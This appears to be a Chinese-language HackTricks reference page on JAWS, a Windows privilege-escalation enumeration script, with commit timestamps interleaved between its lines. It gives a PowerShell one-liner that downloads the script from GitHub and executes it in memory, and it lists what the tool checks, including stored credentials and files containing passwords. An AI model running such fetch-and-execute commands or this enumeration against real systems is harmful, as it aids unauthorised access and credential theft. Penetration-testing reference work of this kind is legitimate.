2022-04-28 16:01:33 +00:00
< details >
2024-01-09 14:10:19 +00:00
< summary > < strong > 从零开始学习AWS黑客攻击直至成为专家, 通过< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-09 14:10:19 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-01-09 14:10:19 +00:00
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来**分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
# 开始
2020-07-15 15:43:14 +00:00
```text
iex(New-Object net.WebClient).downloadstring("https://raw.githubusercontent.com/411Hall/JAWS
/master/jaws-enum.ps1")
```
2023-08-03 19:12:22 +00:00
# 信息收集
2020-07-15 15:43:14 +00:00
2024-01-09 14:10:19 +00:00
它不仅检查权限提升配置错误,还收集有关当前情况的信息。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
* [x] 用户和组
* [x] 网络( 接口、arp、端口、防火墙( 大量输出) 、**主机**)
* [x] 进程
* [x] 计划任务(大量输出)
* [x] 服务(大量输出)
2024-01-09 14:10:19 +00:00
* [x] 已安装软件,程序文件夹
2023-08-03 19:12:22 +00:00
* [x] 补丁
* [x] 驱动器
2024-01-09 14:10:19 +00:00
* [x] 最后修改的文件
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
# 检查
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
* [x] 具有完全控制权限的文件和文件夹
2024-01-09 14:10:19 +00:00
* [x] 未加引号的服务路径
* [x] 潜在有趣的文件
* [x] 包含密码的系统文件
2023-08-03 19:12:22 +00:00
* [x] 存储的凭据
2020-07-15 15:43:14 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-01-09 14:10:19 +00:00
< summary > < strong > 从零开始学习AWS黑客攻击直到成为专家, 通过< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-09 14:10:19 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-01-09 14:10:19 +00:00
* 如果您希望在**HackTricks中看到您的公司广告**或**以PDF格式下载HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >